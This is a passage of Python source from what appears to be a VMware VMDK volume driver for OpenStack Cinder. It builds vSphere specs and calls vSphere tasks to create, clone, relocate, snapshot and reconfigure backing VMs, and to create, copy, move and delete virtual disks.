disk_device_bkng.fileName = vmdk_ds_file_path or ''
disk_device_bkng.diskMode = 'persistent'
return disk_device_bkng
def _create_virtual_disk_config_spec(self, size_kb, disk_type,
controller_key, profile_id,
vmdk_ds_file_path):
"""Returns config spec for adding a virtual disk."""
cf = self._session.vim.client.factory
disk_device = cf.create('ns0:VirtualDisk')
# disk size should be at least 1024KB
disk_device.capacityInKB = max(units.Ki, int(size_kb))
if controller_key < 0:
disk_device.key = controller_key - 1
else:
disk_device.key = -101
disk_device.unitNumber = 0
disk_device.controllerKey = controller_key
disk_device.backing = self._create_disk_backing(disk_type,
vmdk_ds_file_path)
disk_spec = cf.create('ns0:VirtualDeviceConfigSpec')
disk_spec.operation = 'add'
if vmdk_ds_file_path is None:
disk_spec.fileOperation = 'create'
disk_spec.device = disk_device
if profile_id:
disk_profile = cf.create('ns0:VirtualMachineDefinedProfileSpec')
disk_profile.profileId = profile_id
disk_spec.profile = [disk_profile]
return disk_spec
def _create_specs_for_disk_add(self, size_kb, disk_type, adapter_type,
profile_id, vmdk_ds_file_path=None):
"""Create controller and disk config specs for adding a new disk.
:param size_kb: disk size in KB
:param disk_type: disk provisioning type
:param adapter_type: disk adapter type
:param profile_id: storage policy profile identification
:param vmdk_ds_file_path: Optional datastore file path of an existing
virtual disk. If specified, file backing is
not created for the virtual disk.
:return: list containing controller and disk config specs
"""
controller_spec = None
if adapter_type == 'ide':
# For IDE disks, use one of the default IDE controllers (with keys
# 200 and 201) created as part of backing VM creation.
controller_key = 200
else:
controller_spec = self._create_controller_config_spec(adapter_type)
controller_key = controller_spec.device.key
disk_spec = self._create_virtual_disk_config_spec(size_kb,
disk_type,
controller_key,
profile_id,
vmdk_ds_file_path)
specs = [disk_spec]
if controller_spec is not None:
specs.append(controller_spec)
return specs
def _get_extra_config_option_values(self, extra_config):
cf = self._session.vim.client.factory
option_values = []
for key, value in extra_config.items():
opt = cf.create('ns0:OptionValue')
opt.key = key
opt.value = value
option_values.append(opt)
return option_values
def _create_managed_by_info(self):
managed_by = self._session.vim.client.factory.create(
'ns0:ManagedByInfo')
managed_by.extensionKey = self._extension_key
managed_by.type = self._extension_type
return managed_by
def _get_create_spec_disk_less(self, name, ds_name, profileId=None,
extra_config=None):
"""Return spec for creating disk-less backing.
:param name: Name of the backing
:param ds_name: Datastore name where the disk is to be provisioned
:param profileId: Storage profile ID for the backing
:param extra_config: Key-value pairs to be written to backing's
extra-config
:return: Spec for creation
"""
cf = self._session.vim.client.factory
vm_file_info = cf.create('ns0:VirtualMachineFileInfo')
vm_file_info.vmPathName = '[%s]' % ds_name
create_spec = cf.create('ns0:VirtualMachineConfigSpec')
create_spec.name = name
create_spec.guestId = 'otherGuest'
create_spec.numCPUs = 1
create_spec.memoryMB = 128
create_spec.files = vm_file_info
# Set the default hardware version to a compatible version supported by
# vSphere 5.0. This will ensure that the backing VM can be migrated
# without any incompatibility issues in a mixed cluster of ESX hosts
# with versions 5.0 or above.
create_spec.version = self._vmx_version or "vmx-08"
if profileId:
vmProfile = cf.create('ns0:VirtualMachineDefinedProfileSpec')
vmProfile.profileId = profileId
create_spec.vmProfile = [vmProfile]
if extra_config:
if BACKING_UUID_KEY in extra_config:
create_spec.instanceUuid = extra_config.pop(BACKING_UUID_KEY)
create_spec.extraConfig = self._get_extra_config_option_values(
extra_config)
create_spec.managedBy = self._create_managed_by_info()
return create_spec
def get_create_spec(self, name, size_kb, disk_type, ds_name,
profile_id=None, adapter_type='lsiLogic',
extra_config=None):
"""Return spec for creating backing with a single disk.
:param name: name of the backing
:param size_kb: disk size in KB
:param disk_type: disk provisioning type
:param ds_name: datastore name where the disk is to be provisioned
:param profile_id: storage policy profile identification
:param adapter_type: disk adapter type
:param extra_config: key-value pairs to be written to backing's
extra-config
:return: spec for creation
"""
create_spec = self._get_create_spec_disk_less(
name, ds_name, profileId=profile_id, extra_config=extra_config)
create_spec.deviceChange = self._create_specs_for_disk_add(
size_kb, disk_type, adapter_type, profile_id)
return create_spec
def _create_backing_int(self, folder, resource_pool, host, create_spec):
"""Helper for create backing methods."""
LOG.debug("Creating volume backing with spec: %s.", create_spec)
task = self._session.invoke_api(self._session.vim, 'CreateVM_Task',
folder, config=create_spec,
pool=resource_pool, host=host)
task_info = self._session.wait_for_task(task)
backing = task_info.result
LOG.info("Successfully created volume backing: %s.", backing)
return backing
def create_backing(self, name, size_kb, disk_type, folder, resource_pool,
host, ds_name, profileId=None, adapter_type='lsiLogic',
extra_config=None):
"""Create backing for the volume.
Creates a VM with one VMDK based on the given inputs.
:param name: Name of the backing
:param size_kb: Size in KB of the backing
:param disk_type: VMDK type for the disk
:param folder: Folder, where to create the backing under
:param resource_pool: Resource pool reference
:param host: Host reference
:param ds_name: Datastore name where the disk is to be provisioned
:param profileId: Storage profile ID to be associated with backing
:param adapter_type: Disk adapter type
:param extra_config: Key-value pairs to be written to backing's
extra-config
:return: Reference to the created backing entity
"""
LOG.debug("Creating volume backing with name: %(name)s "
"disk_type: %(disk_type)s size_kb: %(size_kb)s "
"adapter_type: %(adapter_type)s profileId: %(profile)s at "
"folder: %(folder)s resource_pool: %(resource_pool)s "
"host: %(host)s datastore_name: %(ds_name)s.",
{'name': name, 'disk_type': disk_type, 'size_kb': size_kb,
'folder': folder, 'resource_pool': resource_pool,
'ds_name': ds_name, 'profile': profileId, 'host': host,
'adapter_type': adapter_type})
create_spec = self.get_create_spec(
name, size_kb, disk_type, ds_name, profile_id=profileId,
adapter_type=adapter_type, extra_config=extra_config)
return self._create_backing_int(folder, resource_pool, host,
create_spec)
def create_backing_disk_less(self, name, folder, resource_pool,
host, ds_name, profileId=None,
extra_config=None):
"""Create disk-less volume backing.
        This type of backing is useful for creating a volume from an image. The
        image downloaded from the image service can be copied to a virtual
        disk of the desired provisioning type and added to the backing VM.
:param name: Name of the backing
:param folder: Folder where the backing is created
:param resource_pool: Resource pool reference
:param host: Host reference
:param ds_name: Name of the datastore used for VM storage
:param profileId: Storage profile ID to be associated with backing
:param extra_config: Key-value pairs to be written to backing's
extra-config
:return: Reference to the created backing entity
"""
LOG.debug("Creating disk-less volume backing with name: %(name)s "
"profileId: %(profile)s at folder: %(folder)s "
"resource pool: %(resource_pool)s host: %(host)s "
"datastore_name: %(ds_name)s.",
{'name': name, 'profile': profileId, 'folder': folder,
'resource_pool': resource_pool, 'host': host,
'ds_name': ds_name})
create_spec = self._get_create_spec_disk_less(
name, ds_name, profileId=profileId, extra_config=extra_config)
return self._create_backing_int(folder, resource_pool, host,
create_spec)
def get_datastore(self, backing):
"""Get datastore where the backing resides.
:param backing: Reference to the backing
:return: Datastore reference to which the backing belongs
"""
return self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, backing,
'datastore').ManagedObjectReference[0]
def get_summary(self, datastore):
"""Get datastore summary.
:param datastore: Reference to the datastore
:return: 'summary' property of the datastore
"""
return self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, datastore,
'summary')
def _create_relocate_spec_disk_locator(self, datastore, disk_type,
disk_device):
"""Creates spec for disk type conversion during relocate."""
cf = self._session.vim.client.factory
disk_locator = cf.create("ns0:VirtualMachineRelocateSpecDiskLocator")
disk_locator.datastore = datastore
disk_locator.diskId = disk_device.key
disk_locator.diskBackingInfo = self._create_disk_backing(disk_type,
None)
return disk_locator
def _get_relocate_spec(self, datastore, resource_pool, host,
disk_move_type, disk_type=None, disk_device=None):
"""Return spec for relocating volume backing.
:param datastore: Reference to the datastore
:param resource_pool: Reference to the resource pool
:param host: Reference to the host
:param disk_move_type: Disk move type option
:param disk_type: Destination disk type
:param disk_device: Virtual device corresponding to the disk
:return: Spec for relocation
"""
cf = self._session.vim.client.factory
relocate_spec = cf.create('ns0:VirtualMachineRelocateSpec')
relocate_spec.datastore = datastore
relocate_spec.pool = resource_pool
relocate_spec.host = host
relocate_spec.diskMoveType = disk_move_type
if disk_type is not None and disk_device is not None:
disk_locator = self._create_relocate_spec_disk_locator(datastore,
disk_type,
disk_device)
relocate_spec.disk = [disk_locator]
LOG.debug("Spec for relocating the backing: %s.", relocate_spec)
return relocate_spec
def relocate_backing(
self, backing, datastore, resource_pool, host, disk_type=None):
"""Relocates backing to the input datastore and resource pool.
The implementation uses moveAllDiskBackingsAndAllowSharing disk move
type.
:param backing: Reference to the backing
:param datastore: Reference to the datastore
:param resource_pool: Reference to the resource pool
:param host: Reference to the host
:param disk_type: destination disk type
"""
LOG.debug("Relocating backing: %(backing)s to datastore: %(ds)s "
"and resource pool: %(rp)s with destination disk type: "
"%(disk_type)s.",
{'backing': backing,
'ds': datastore,
'rp': resource_pool,
'disk_type': disk_type})
# Relocate the volume backing
disk_move_type = 'moveAllDiskBackingsAndAllowSharing'
disk_device = None
if disk_type is not None:
disk_device = self._get_disk_device(backing)
relocate_spec = self._get_relocate_spec(datastore, resource_pool, host,
disk_move_type, disk_type,
disk_device)
task = self._session.invoke_api(self._session.vim, 'RelocateVM_Task',
backing, spec=relocate_spec)
LOG.debug("Initiated relocation of volume backing: %s.", backing)
self._session.wait_for_task(task)
LOG.info("Successfully relocated volume backing: %(backing)s "
"to datastore: %(ds)s and resource pool: %(rp)s.",
{'backing': backing, 'ds': datastore, 'rp': resource_pool})
def move_backing_to_folder(self, backing, folder):
"""Move the volume backing to the folder.
:param backing: Reference to the backing
:param folder: Reference to the folder
"""
LOG.debug("Moving backing: %(backing)s to folder: %(fol)s.",
{'backing': backing, 'fol': folder})
task = self._session.invoke_api(self._session.vim,
'MoveIntoFolder_Task', folder,
list=[backing])
LOG.debug("Initiated move of volume backing: %(backing)s into the "
"folder: %(fol)s.", {'backing': backing, 'fol': folder})
self._session.wait_for_task(task)
LOG.info("Successfully moved volume "
"backing: %(backing)s into the "
"folder: %(fol)s.", {'backing': backing, 'fol': folder})
def create_snapshot(self, backing, name, description, quiesce=False):
"""Create snapshot of the backing with given name and description.
:param backing: Reference to the backing entity
:param name: Snapshot name
:param description: Snapshot description
:param quiesce: Whether to quiesce the backing when taking snapshot
:return: Created snapshot entity reference
"""
LOG.debug("Snapshoting backing: %(backing)s with name: %(name)s.",
{'backing': backing, 'name': name})
task = self._session.invoke_api(self._session.vim,
'CreateSnapshot_Task',
backing, name=name,
description=description,
memory=False, quiesce=quiesce)
LOG.debug("Initiated snapshot of volume backing: %(backing)s "
"named: %(name)s.", {'backing': backing, 'name': name})
task_info = self._session.wait_for_task(task)
snapshot = task_info.result
LOG.info("Successfully created snapshot: %(snap)s for volume "
"backing: %(backing)s.",
{'snap': snapshot, 'backing': backing})
return snapshot
@staticmethod
def _get_snapshot_from_tree(name, root):
"""Get snapshot by name from the snapshot tree root.
:param name: Snapshot name
:param root: Current root node in the snapshot tree
        :return: Snapshot in the snapshot tree with the given name, or None
                 if it is not found
"""
if not root:
return None
if root.name == name:
return root.snapshot
if (not hasattr(root, 'childSnapshotList') or
not root.childSnapshotList):
            # When root does not have children, the childSnapshotList attr
            # is sometimes missing. Adding an additional check.
return None
for node in root.childSnapshotList:
snapshot = VMwareVolumeOps._get_snapshot_from_tree(name, node)
if snapshot:
return snapshot
def get_snapshot(self, backing, name):
"""Get snapshot of the backing with given name.
:param backing: Reference to the backing entity
:param name: Snapshot name
:return: Snapshot entity of the backing with given name
"""
snapshot = self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, backing,
'snapshot')
if not snapshot or not snapshot.rootSnapshotList:
return None
for root in snapshot.rootSnapshotList:
return VMwareVolumeOps._get_snapshot_from_tree(name, root)
def snapshot_exists(self, backing):
"""Check if the given backing contains snapshots."""
snapshot = self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, backing,
'snapshot')
if snapshot is None or snapshot.rootSnapshotList is None:
return False
return len(snapshot.rootSnapshotList) != 0
def delete_snapshot(self, backing, name):
"""Delete a given snapshot from volume backing.
:param backing: Reference to the backing entity
:param name: Snapshot name
"""
LOG.debug("Deleting the snapshot: %(name)s from backing: "
"%(backing)s.",
{'name': name, 'backing': backing})
snapshot = self.get_snapshot(backing, name)
if not snapshot:
LOG.info("Did not find the snapshot: %(name)s for backing: "
"%(backing)s. Need not delete anything.",
{'name': name, 'backing': backing})
return
task = self._session.invoke_api(self._session.vim,
'RemoveSnapshot_Task',
snapshot, removeChildren=False)
LOG.debug("Initiated snapshot: %(name)s deletion for backing: "
"%(backing)s.",
{'name': name, 'backing': backing})
self._session.wait_for_task(task)
LOG.info("Successfully deleted snapshot: %(name)s of backing: "
"%(backing)s.", {'backing': backing, 'name': name})
def revert_to_snapshot(self, backing, name):
LOG.debug("Revert to snapshot: %(name)s of backing: %(backing)s.",
{'name': name, 'backing': backing})
snapshot = self.get_snapshot(backing, name)
if not snapshot:
raise vmdk_exceptions.SnapshotNotFoundException(
name=name)
task = self._session.invoke_api(self._session.vim,
'RevertToSnapshot_Task',
snapshot)
self._session.wait_for_task(task)
def _get_folder(self, backing):
"""Get parent folder of the backing.
:param backing: Reference to the backing entity
:return: Reference to parent folder of the backing entity
"""
return self._get_parent(backing, 'Folder')
def _get_clone_spec(self, datastore, disk_move_type, snapshot, backing,
disk_type, host=None, resource_pool=None,
extra_config=None, disks_to_clone=None):
"""Get the clone spec.
:param datastore: Reference to datastore
:param disk_move_type: Disk move type
:param snapshot: Reference to snapshot
:param backing: Source backing VM
:param disk_type: Disk type of clone
:param host: Target host
:param resource_pool: Target resource pool
:param extra_config: Key-value pairs to be written to backing's
extra-config
:param disks_to_clone: UUIDs of disks to clone
:return: Clone spec
"""
if disk_type is not None:
disk_device = self._get_disk_device(backing)
else:
disk_device = None
relocate_spec = self._get_relocate_spec(datastore, resource_pool, host,
disk_move_type, disk_type,
disk_device)
cf = self._session.vim.client.factory
clone_spec = cf.create('ns0:VirtualMachineCloneSpec')
clone_spec.location = relocate_spec
clone_spec.powerOn = False
clone_spec.template = False
clone_spec.snapshot = snapshot
config_spec = cf.create('ns0:VirtualMachineConfigSpec')
config_spec.managedBy = self._create_managed_by_info()
clone_spec.config = config_spec
if extra_config:
if BACKING_UUID_KEY in extra_config:
config_spec.instanceUuid = extra_config.pop(BACKING_UUID_KEY)
config_spec.extraConfig = self._get_extra_config_option_values(
extra_config)
if disks_to_clone:
config_spec.deviceChange = (
self._create_device_change_for_disk_removal(
backing, disks_to_clone))
LOG.debug("Spec for cloning the backing: %s.", clone_spec)
return clone_spec
def _create_device_change_for_disk_removal(self, backing, disks_to_clone):
disk_devices = self._get_disk_devices(backing)
device_change = []
for device in disk_devices:
if device.backing.uuid not in disks_to_clone:
device_change.append(self._create_spec_for_disk_remove(device))
return device_change
def clone_backing(self, name, backing, snapshot, clone_type, datastore,
disk_type=None, host=None, resource_pool=None,
extra_config=None, folder=None, disks_to_clone=None):
"""Clone backing.
If the clone_type is 'full', then a full clone of the source volume
backing will be created. Else, if it is 'linked', then a linked clone
of the source volume backing will be created.
:param name: Name for the clone
:param backing: Reference to the backing entity
:param snapshot: Snapshot point from which the clone should be done
:param clone_type: Whether a full clone or linked clone is to be made
:param datastore: Reference to the datastore entity
:param disk_type: Disk type of the clone
:param host: Target host
:param resource_pool: Target resource pool
:param extra_config: Key-value pairs to be written to backing's
extra-config
:param folder: The location of the clone
:param disks_to_clone: UUIDs of disks to clone
"""
LOG.debug("Creating a clone of backing: %(back)s, named: %(name)s, "
"clone type: %(type)s from snapshot: %(snap)s on "
"resource pool: %(resource_pool)s, host: %(host)s, "
"datastore: %(ds)s with disk type: %(disk_type)s.",
{'back': backing, 'name': name, 'type': clone_type,
'snap': snapshot, 'ds': datastore, 'disk_type': disk_type,
'host': host, 'resource_pool': resource_pool})
if folder is None:
# Use source folder as the location of the clone.
folder = self._get_folder(backing)
if clone_type == LINKED_CLONE_TYPE:
disk_move_type = 'createNewChildDiskBacking'
else:
disk_move_type = 'moveAllDiskBackingsAndDisallowSharing'
clone_spec = self._get_clone_spec(
datastore, disk_move_type, snapshot, backing, disk_type, host=host,
resource_pool=resource_pool, extra_config=extra_config,
disks_to_clone=disks_to_clone)
task = self._session.invoke_api(self._session.vim, 'CloneVM_Task',
backing, folder=folder, name=name,
spec=clone_spec)
LOG.debug("Initiated clone of backing: %s.", name)
task_info = self._session.wait_for_task(task)
new_backing = task_info.result
LOG.info("Successfully created clone: %s.", new_backing)
return new_backing
def _reconfigure_backing(self, backing, reconfig_spec):
"""Reconfigure backing VM with the given spec."""
LOG.debug("Reconfiguring backing VM: %(backing)s with spec: %(spec)s.",
{'backing': backing,
'spec': reconfig_spec})
reconfig_task = self._session.invoke_api(self._session.vim,
"ReconfigVM_Task",
backing,
spec=reconfig_spec)
LOG.debug("Task: %s created for reconfiguring backing VM.",
reconfig_task)
self._session.wait_for_task(reconfig_task)
def _get_controller(self, backing, adapter_type):
devices = self._session.invoke_api(vim_util,
'get_object_property',
self._session.vim,
backing,
'config.hardware.device')
controller_type = ControllerType.get_controller_type(adapter_type)
for device in devices:
if device.__class__.__name__ == controller_type:
return device
def attach_disk_to_backing(self, backing, size_in_kb, disk_type,
adapter_type, profile_id, vmdk_ds_file_path):
"""Attach an existing virtual disk to the backing VM.
:param backing: reference to the backing VM
:param size_in_kb: disk size in KB
:param disk_type: virtual disk type
:param adapter_type: disk adapter type
:param profile_id: storage policy profile identification
:param vmdk_ds_file_path: datastore file path of the virtual disk to
be attached
"""
LOG.debug("Reconfiguring backing VM: %(backing)s to add new disk: "
"%(path)s with size (KB): %(size)d and adapter type: "
"%(adapter_type)s.",
{'backing': backing,
'path': vmdk_ds_file_path,
'size': size_in_kb,
'adapter_type': adapter_type})
cf = self._session.vim.client.factory
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
controller = self._get_controller(backing, adapter_type)
if controller:
disk_spec = self._create_virtual_disk_config_spec(
size_in_kb,
disk_type,
controller.key,
profile_id,
vmdk_ds_file_path)
specs = [disk_spec]
else:
specs = self._create_specs_for_disk_add(
size_in_kb,
disk_type,
adapter_type,
profile_id,
vmdk_ds_file_path=vmdk_ds_file_path)
reconfig_spec.deviceChange = specs
self._reconfigure_backing(backing, reconfig_spec)
LOG.debug("Backing VM: %s reconfigured with new disk.", backing)
def _create_spec_for_disk_remove(self, disk_device):
cf = self._session.vim.client.factory
disk_spec = cf.create('ns0:VirtualDeviceConfigSpec')
disk_spec.operation = 'remove'
disk_spec.device = disk_device
return disk_spec
def detach_disk_from_backing(self, backing, disk_device):
"""Detach the given disk from backing."""
LOG.debug("Reconfiguring backing VM: %(backing)s to remove disk: "
"%(disk_device)s.",
{'backing': backing, 'disk_device': disk_device})
cf = self._session.vim.client.factory
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
spec = self._create_spec_for_disk_remove(disk_device)
reconfig_spec.deviceChange = [spec]
self._reconfigure_backing(backing, reconfig_spec)
def rename_backing(self, backing, new_name):
"""Rename backing VM.
:param backing: VM to be renamed
:param new_name: new VM name
"""
LOG.info("Renaming backing VM: %(backing)s to %(new_name)s.",
{'backing': backing,
'new_name': new_name})
rename_task = self._session.invoke_api(self._session.vim,
"Rename_Task",
backing,
newName=new_name)
LOG.debug("Task: %s created for renaming VM.", rename_task)
self._session.wait_for_task(rename_task)
LOG.info("Backing VM: %(backing)s renamed to %(new_name)s.",
{'backing': backing,
'new_name': new_name})
def change_backing_profile(self, backing, profile_id):
"""Change storage profile of the backing VM.
The current profile is removed if the new profile is None.
"""
LOG.debug("Reconfiguring backing VM: %(backing)s to change profile to:"
" %(profile)s.",
{'backing': backing,
'profile': profile_id})
cf = self._session.vim.client.factory
if profile_id is None:
vm_profile = cf.create('ns0:VirtualMachineEmptyProfileSpec')
else:
vm_profile = cf.create('ns0:VirtualMachineDefinedProfileSpec')
vm_profile.profileId = profile_id.uniqueId
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
reconfig_spec.vmProfile = [vm_profile]
disk_device = self._get_disk_device(backing)
disk_spec = cf.create('ns0:VirtualDeviceConfigSpec')
disk_spec.device = disk_device
disk_spec.operation = 'edit'
disk_spec.profile = [vm_profile]
reconfig_spec.deviceChange = [disk_spec]
self._reconfigure_backing(backing, reconfig_spec)
LOG.debug("Backing VM: %(backing)s reconfigured with new profile: "
"%(profile)s.",
{'backing': backing,
'profile': profile_id})
def update_backing_disk_uuid(self, backing, disk_uuid):
"""Update backing VM's disk UUID.
:param backing: Reference to backing VM
:param disk_uuid: New disk UUID
"""
LOG.debug("Reconfiguring backing VM: %(backing)s to change disk UUID "
"to: %(disk_uuid)s.",
{'backing': backing,
'disk_uuid': disk_uuid})
disk_device = self._get_disk_device(backing)
disk_device.backing.uuid = disk_uuid
cf = self._session.vim.client.factory
disk_spec = cf.create('ns0:VirtualDeviceConfigSpec')
disk_spec.device = disk_device
disk_spec.operation = 'edit'
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
reconfig_spec.deviceChange = [disk_spec]
self._reconfigure_backing(backing, reconfig_spec)
LOG.debug("Backing VM: %(backing)s reconfigured with new disk UUID: "
"%(disk_uuid)s.",
{'backing': backing,
'disk_uuid': disk_uuid})
def update_backing_extra_config(self, backing, extra_config):
cf = self._session.vim.client.factory
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
if BACKING_UUID_KEY in extra_config:
reconfig_spec.instanceUuid = extra_config.pop(BACKING_UUID_KEY)
reconfig_spec.extraConfig = self._get_extra_config_option_values(
extra_config)
self._reconfigure_backing(backing, reconfig_spec)
LOG.debug("Backing: %(backing)s reconfigured with extra config: "
"%(extra_config)s.",
{'backing': backing,
'extra_config': extra_config})
def update_backing_uuid(self, backing, uuid):
cf = self._session.vim.client.factory
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
reconfig_spec.instanceUuid = uuid
self._reconfigure_backing(backing, reconfig_spec)
LOG.debug("Backing: %(backing)s reconfigured with uuid: %(uuid)s.",
{'backing': backing,
'uuid': uuid})
def delete_file(self, file_path, datacenter=None):
"""Delete file or folder on the datastore.
:param file_path: Datastore path of the file or folder
"""
LOG.debug("Deleting file: %(file)s under datacenter: %(dc)s.",
{'file': file_path, 'dc': datacenter})
fileManager = self._session.vim.service_content.fileManager
task = self._session.invoke_api(self._session.vim,
'DeleteDatastoreFile_Task',
fileManager,
name=file_path,
datacenter=datacenter)
LOG.debug("Initiated deletion via task: %s.", task)
self._session.wait_for_task(task)
LOG.info("Successfully deleted file: %s.", file_path)
def create_datastore_folder(self, ds_name, folder_path, datacenter):
"""Creates a datastore folder.
This method returns silently if the folder already exists.
:param ds_name: datastore name
:param folder_path: path of folder to create
:param datacenter: datacenter of target datastore
"""
fileManager = self._session.vim.service_content.fileManager
ds_folder_path = "[%s] %s" % (ds_name, folder_path)
LOG.debug("Creating datastore folder: %s.", ds_folder_path)
try:
self._session.invoke_api(self._session.vim,
'MakeDirectory',
fileManager,
name=ds_folder_path,
datacenter=datacenter)
LOG.info("Created datastore folder: %s.", folder_path)
except exceptions.FileAlreadyExistsException:
LOG.debug("Datastore folder: %s already exists.", folder_path)
def get_path_name(self, backing):
"""Get path name of the backing.
:param backing: Reference to the backing entity
:return: Path name of the backing
"""
return self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, backing,
'config.files').vmPathName
def get_entity_name(self, entity):
"""Get name of the managed entity.
:param entity: Reference to the entity
:return: Name of the managed entity
"""
return self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, entity, 'name')
def _get_disk_device(self, backing):
"""Get the virtual device corresponding to disk."""
hardware_devices = self._session.invoke_api(vim_util,
'get_object_property',
self._session.vim,
backing,
'config.hardware.device')
if hardware_devices.__class__.__name__ == "ArrayOfVirtualDevice":
hardware_devices = hardware_devices.VirtualDevice
for device in hardware_devices:
if device.__class__.__name__ == "VirtualDisk":
return device
LOG.error("Virtual disk device of backing: %s not found.", backing)
raise vmdk_exceptions.VirtualDiskNotFoundException()
def get_vmdk_path(self, backing):
"""Get the vmdk file name of the backing.
The vmdk file path of the backing returned is of the form:
"[datastore1] my_folder/my_vm.vmdk"
:param backing: Reference to the backing
:return: VMDK file path of the backing
"""
disk_device = self._get_disk_device(backing)
backing = disk_device.backing
if backing.__class__.__name__ != "VirtualDiskFlatVer2BackingInfo":
msg = _("Invalid disk backing: %s.") % backing.__class__.__name__
LOG.error(msg)
raise AssertionError(msg)
return backing.fileName
def get_disk_size(self, backing):
"""Get disk size of the backing.
:param backing: backing VM reference
:return: disk size in bytes
"""
disk_device = self._get_disk_device(backing)
return disk_device.capacityInKB * units.Ki
def _get_virtual_disk_create_spec(self, size_in_kb, adapter_type,
disk_type):
"""Return spec for file-backed virtual disk creation."""
cf = self._session.vim.client.factory
spec = cf.create('ns0:FileBackedVirtualDiskSpec')
spec.capacityKb = size_in_kb
spec.adapterType = VirtualDiskAdapterType.get_adapter_type(
adapter_type)
spec.diskType = VirtualDiskType.get_virtual_disk_type(disk_type)
return spec
def create_virtual_disk(self, dc_ref, vmdk_ds_file_path, size_in_kb,
adapter_type='busLogic', disk_type='preallocated'):
"""Create virtual disk with the given settings.
:param dc_ref: datacenter reference
:param vmdk_ds_file_path: datastore file path of the virtual disk
:param size_in_kb: disk size in KB
:param adapter_type: disk adapter type
:param disk_type: vmdk type
"""
virtual_disk_spec = self._get_virtual_disk_create_spec(size_in_kb,
adapter_type,
disk_type)
LOG.debug("Creating virtual disk with spec: %s.", virtual_disk_spec)
disk_manager = self._session.vim.service_content.virtualDiskManager
task = self._session.invoke_api(self._session.vim,
'CreateVirtualDisk_Task',
disk_manager,
name=vmdk_ds_file_path,
datacenter=dc_ref,
spec=virtual_disk_spec)
LOG.debug("Task: %s created for virtual disk creation.", task)
self._session.wait_for_task(task)
LOG.debug("Created virtual disk with spec: %s.", virtual_disk_spec)
def create_flat_extent_virtual_disk_descriptor(
self, dc_ref, path, size_in_kb, adapter_type, disk_type):
"""Create descriptor for a single flat extent virtual disk.
To create the descriptor, we create a virtual disk and delete its flat
extent.
:param dc_ref: reference to the datacenter
:param path: descriptor datastore file path
:param size_in_kb: size of the virtual disk in KB
:param adapter_type: virtual disk adapter type
:param disk_type: type of the virtual disk
"""
LOG.debug("Creating descriptor: %(path)s with size (KB): %(size)s, "
"adapter_type: %(adapter_type)s and disk_type: "
"%(disk_type)s.",
{'path': path.get_descriptor_ds_file_path(),
'size': size_in_kb,
'adapter_type': adapter_type,
'disk_type': disk_type
})
self.create_virtual_disk(dc_ref, path.get_descriptor_ds_file_path(),
size_in_kb, adapter_type, disk_type)
self.delete_file(path.get_flat_extent_ds_file_path(), dc_ref)
LOG.debug("Created descriptor: %s.",
path.get_descriptor_ds_file_path())
def copy_vmdk_file(self, src_dc_ref, src_vmdk_file_path,
dest_vmdk_file_path, dest_dc_ref=None):
"""Copy contents of the src vmdk file to dest vmdk file.
:param src_dc_ref: Reference to datacenter containing src datastore
:param src_vmdk_file_path: Source vmdk file path
:param dest_vmdk_file_path: Destination vmdk file path
:param dest_dc_ref: Reference to datacenter of dest datastore.
If unspecified, source datacenter is used.
"""
LOG.debug('Copying disk: %(src)s to %(dest)s.',
{'src': src_vmdk_file_path,
'dest': dest_vmdk_file_path})
dest_dc_ref = dest_dc_ref or src_dc_ref
diskMgr = self._session.vim.service_content.virtualDiskManager
task = self._session.invoke_api(self._session.vim,
'CopyVirtualDisk_Task',
diskMgr,
sourceName=src_vmdk_file_path,
sourceDatacenter=src_dc_ref,
destName=dest_vmdk_file_path,
destDatacenter=dest_dc_ref,
force=True)
LOG.debug("Initiated copying disk data via task: %s.", task)
self._session.wait_for_task(task)
LOG.info("Successfully copied disk at: %(src)s to: %(dest)s.",
{'src': src_vmdk_file_path, 'dest': dest_vmdk_file_path})
def move_vmdk_file(self, src_dc_ref, src_vmdk_file_path,
dest_vmdk_file_path, dest_dc_ref=None):
"""Move the given vmdk file to another datastore location.
:param src_dc_ref: Reference to datacenter containing src datastore
:param src_vmdk_file_path: Source vmdk file path
:param dest_vmdk_file_path: Destination vmdk file path
:param dest_dc_ref: Reference to datacenter of dest datastore.
If unspecified, source datacenter is used.
"""
LOG.debug('Moving disk: %(src)s to %(dest)s.',
{'src': src_vmdk_file_path, 'dest': dest_vmdk_file_path})
dest_dc_ref = dest_dc_ref or src_dc_ref
diskMgr = self._session.vim.service_content.virtualDiskManager
task = self._session.invoke_api(self._session.vim,
'MoveVirtualDisk_Task',
diskMgr,
sourceName=src_vmdk_file_path,
sourceDatacenter=src_dc_ref,
destName=dest_vmdk_file_path,
destDatacenter=dest_dc_ref,
force=True)
self._session.wait_for_task(task)
def copy_datastore_file(self, vsphere_url, dest_dc_ref, dest_ds_file_path):
"""Copy file to datastore location.
:param vsphere_url: vsphere URL of the file
:param dest_dc_ref: Reference to destination datacenter
        :param dest_ds_file_path: Destination datastore file path
"""
LOG.debug("Copying file: %(vsphere_url)s to %(path)s.",
{'vsphere_url': vsphere_url,
'path': dest_ds_file_path})
location_url = ds_obj.DatastoreURL.urlparse(vsphere_url)
src_path = ds_obj.DatastorePath(location_url.datastore_name,
location_url.path)
src_dc_ref = self.get_entity_by_inventory_path(
location_url.datacenter_path)
task = self._session.invoke_api(
self._session.vim,
'CopyDatastoreFile_Task',
self._session.vim.service_content.fileManager,
sourceName=six.text_type(src_path),
sourceDatacenter=src_dc_ref,
destinationName=dest_ds_file_path,
destinationDatacenter=dest_dc_ref)
self._session.wait_for_task(task)
def delete_vmdk_file(self, vmdk_file_path, dc_ref):
"""Delete given vmdk files.
:param vmdk_file_path: VMDK file path to be deleted
:param dc_ref: Reference to datacenter that contains this VMDK file
"""
LOG.debug("Deleting vmdk file: %s.", vmdk_file_path)
diskMgr = self._session.vim.service_content.virtualDiskManager
task = self._session.invoke_api(self._session.vim,
'DeleteVirtualDisk_Task',
diskMgr,
name=vmdk_file_path,
datacenter=dc_ref)
